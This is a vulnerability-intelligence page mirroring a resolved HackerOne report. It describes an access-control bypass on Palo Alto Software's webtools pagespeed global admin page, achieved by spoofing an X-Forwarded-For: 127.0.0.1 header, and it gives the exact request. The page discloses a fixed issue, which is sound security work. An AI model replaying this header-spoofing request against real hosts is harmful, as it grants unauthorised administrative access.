Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

[Bypass #870709] Unauthorised access to pagespeed global admin at https://webtools.paloalto.com/

Medium
P
Palo Alto Software
Submitted None

Team Summary

Official summary from Palo Alto Software

Hi team, I found bypass of report #870709. Just by using X-Forwarded-For: 127.0.0.1 you can again get access to global admin page. Bypass request Request ``` GET /pagespeed-global-admin/ HTTP/1.1 Host: webtools.paloalto.com X-Forwarded-For: 127.0.0.1 ```

Actions:
View on HackerOne
Reported by silentkiller_

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Improper Access Control - Generic